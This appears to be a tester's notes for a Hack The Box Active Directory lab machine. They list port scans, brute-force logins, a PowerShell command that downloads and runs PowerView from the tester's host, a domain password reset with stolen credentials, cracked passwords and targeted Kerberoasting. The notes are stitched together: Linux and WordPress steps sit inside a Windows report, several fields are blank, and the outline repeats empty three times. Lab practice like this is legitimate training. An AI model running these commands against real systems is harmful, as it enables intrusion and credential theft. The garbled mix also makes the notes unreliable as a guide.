HTB_AD_Administrator: Pentration Testing Report

Name	item
Platform	OSCP Play Ground
Date	2025-09-15 08:58:47
Auth	Blackwin
Tools used	nmap; gobuster; brupsuite; wpscan
Key words	id_rsa; polkit; LXD
Ip address	10.10.11.42
Flag	proof.txt: 9e89507dcfd2001796d15b5eae75a18clocal.txt: 53825454332a4b5d2c4b14a7315ec6d4

Olivia ichliebedich

1. Initial Reconasission

Port scanning

rustscan -a 10.10.11.42 --scripts none --ulimit 5000 | tee scans/rustscan
sudo nmap -sCV -p21,53,88,139,135,389,445,464,593,3268,3269,5985,9389,636,47001,49644,49664,49665,49666,49667,49668,62839,62850,62855,62858,62877 10.10.11.42 -oN scans/nmap
sudo nmap -sCV -p- --open 10.10.11.42 -oN scans/nmap-all

2. Enumeration

FTP Enum

ftp,lftp

SMB Enum

enum4linux

Web Enum

directory brute

ffuf -u http://10.10.11.42/FUZZ -w /usr/share/wordlists/dirb/big.txt
gobuster dir -u http://10.10.11.42/ -w /usr/share/wordlists/dirb/big.txt

brute force login

hydra -l loly -P rockyou.txt 10.10.11.42 http-post-form /wordpress/wp-login.php:F=Error -V -t 5 -w 1 -o results.txt
wpscan --url http://10.10.11.42/wordpress -U loly -P rockyou.txt

3. Initial Shell

powershell

IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4:4000/PowerView.ps1')
$SecPassword = ConvertTo-SecureString 'nirza123' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential ('ADMINISTRATOR\michael', $SecPassword)
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity benjamin -AccountPassword $UserPassword -Credential  $Cred

Backup.psafe3:tekieromucho alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb emma: WwANQWnmJnGV07WQN8bMS7FMAbjNur

targeted-ke python3 targetedKerberoast.py --dc-ip 10.10.11.42 -d administrator.htb -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' -U ethan.txt

4. Post-Enumeration

get flag: find / -name local.txt 2>/dev/null

get basic info:

OS version:
sudo version:
psexec version:
users: cat /etc/passwd
flag: find / -name local.txt 2>/dev/null
SUDI binaries:
find / -user root -perm -4000 -exec ls -ldb {} ; 2>/dev/null
find / -uid 0 -perm -6000 -type f 2>/dev/null

HTB_AD_Administrator: Pentration Testing Report

1. Initial Reconasission

2. Enumeration

FTP Enum

SMB Enum

Web Enum

3. Initial Shell

4. Post-Enumeration

5. Root Shell

6. What learned

HTB_AD_Administrator: Pentration Testing Report ​

1. Initial Reconasission ​

2. Enumeration ​

FTP Enum ​

SMB Enum ​

Web Enum ​

3. Initial Shell ​

4. Post-Enumeration ​

5. Root Shell ​

6. What learned ​

HTB_AD_Administrator: Pentration Testing Report

1. Initial Reconasission

2. Enumeration

FTP Enum

SMB Enum

Web Enum

3. Initial Shell

4. Post-Enumeration

5. Root Shell

6. What learned